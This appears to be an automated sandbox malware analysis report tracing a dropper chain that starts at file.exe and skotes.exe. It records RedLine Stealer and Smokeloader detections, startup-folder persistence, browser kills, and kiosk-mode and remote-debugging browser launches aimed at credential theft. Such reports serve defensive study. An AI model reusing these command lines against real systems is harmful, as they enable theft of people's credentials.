Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_004156EE	20_2_004156EE
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0040B690	20_2_0040B690
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_1000E184	20_2_1000E184
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_100102A0	20_2_100102A0
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_00A9B96A	20_2_00A9B96A
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0099089A	20_2_0099089A
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0098DE9D	20_2_0098DE9D
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_00984CAE	20_2_00984CAE
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_008772CF	20_2_008772CF
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0098825D	20_2_0098825D
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_00986780	20_2_00986780
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_00989DE5	20_2_00989DE5
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_008AD509	20_2_008AD509
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_008AE937	20_2_008AE937
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_00992349	20_2_00992349
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0092394A	20_2_0092394A
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_0097FF4A	20_2_0097FF4A
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B351B7	20_2_04B351B7
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B3EDEE	20_2_04B3EDEE
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B33F87	20_2_04B33F87
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B3B8F7	20_2_04B3B8F7
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B351B7	20_2_04B351B7
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B3F130	20_2_04B3F130
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B45955	20_2_04B45955
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: 20_2_04B40B67	20_2_04B40B67

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: String function: 00B19DFF appears 36 times
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: String function: 00414A30 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: String function: 00B13BC0 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Code function: String function: 00408000 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 003780C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: String function: 04CF9B60 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: String function: 0040A760 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: String function: 10003160 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Code function: String function: 04B3A9C7 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00E180C0 appears 130 times

Source: random[1].exe1.12.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: 8f25543307.exe.12.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000014.00000002.3185422148.0000000000CBC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.3453206176.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.3194281955.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: BlueMail[1].exe.12.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BlueMail.exe.12.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vmwin.exe.14.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 994907c116.exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: 994907c116.exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[1].exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[1].exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: 3b636bd67f.exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: 3b636bd67f.exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.0003383629931388
Source: random[2].exe0.12.dr	Static PE information: Section: zzjczccs ZLIB complexity 0.9948900731442681
Source: 9f2ded7baa.exe.12.dr	Static PE information: Section: zzjczccs ZLIB complexity 0.9948900731442681

Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 14.2.BlueMail.exe.60f0000.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@93/65@81/18

Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe

Code function: 20_2_00402A20 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

20_2_00402A20

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe

Code function: 17_2_004152A5 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

17_2_004152A5

Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe

Code function: 19_2_00430A6C CoCreateInstance,

19_2_00430A6C

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\BlueMail[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\SyncRootManager
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2848:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3712:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Mutant created: \Sessions\1\BaseNamedObjects\bf11e9eb444cca0553e5dc41fdf05974
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user~1\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs"

Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Command line argument: emp		20_2_00408770
Source: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe	Command line argument: mixtwo		20_2_00408770

Source: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\conhost.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: chrome.exe, 00000019.00000002.2806264599.00006AE40076C000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));

Source: file.exe

ReversingLabs: Detection: 60%

Source: 8f25543307.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe "C:\Users\user~1\AppData\Local\Temp\1014879001\c2bea0d661.exe"
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe "C:\Users\user~1\AppData\Local\Temp\1014880001\8f25543307.exe"
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process created: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process created: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe "C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe "C:\Users\user~1\AppData\Local\Temp\1014881001\a629a70424.exe"
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2388,i,2229604721330968177,18404601518371306528,262144 /prefetch:8
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vmwin.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\vmwin.exe "C:\Users\user\AppData\Local\Temp\vmwin.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe "C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe"
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe "C:\Users\user~1\AppData\Local\Temp\1014883001\9f2ded7baa.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2212 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1110a5b-abe5-4b46-a8d5-e81b4ffdee10} 7540 "\\.\pipe\gecko-crash-server-pipe.7540" 20db436d510 socket
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe "C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe "C:\Users\user~1\AppData\Local\Temp\1014879001\c2bea0d661.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014880001\8f25543307.exe "C:\Users\user~1\AppData\Local\Temp\1014880001\8f25543307.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014881001\a629a70424.exe "C:\Users\user~1\AppData\Local\Temp\1014881001\a629a70424.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe "C:\Users\user~1\AppData\Local\Temp\1014882001\75e257f622.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1014883001\9f2ded7baa.exe "C:\Users\user~1\AppData\Local\Temp\1014883001\9f2ded7baa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process created: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe "C:\Users\user~1\AppData\Local\Temp\1014844001\BlueMail.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe	Process created: C:\Users\user\AppData\Local\Temp\1014878001\3b636bd67f.exe "C:\Users\user~1\AppData\Local\Temp\1014878001\3b636bd67f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014879001\c2bea0d661.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1014844001\BlueMail.exe	Process created: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe "C:\Users\user~1\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7725ce688f\Gxtuum.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2584 --field-trial-handle=2388,i,2229604721330968177,18404601518371306528,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\vmwin.exe "C:\Users\user\AppData\Local\Temp\vmwin.exe"
Source: C:\Users\user\AppData\Local\Temp\vmwin.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1014882001\75e257f622.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2240 -prefMapHandle 2212 -prefsLen 25302 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b1110a5b-abe5-4b46-a8d5-e81b4ffdee10} 7540 "\\.\pipe\gecko-crash-server-pipe.7540" 20db436d510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
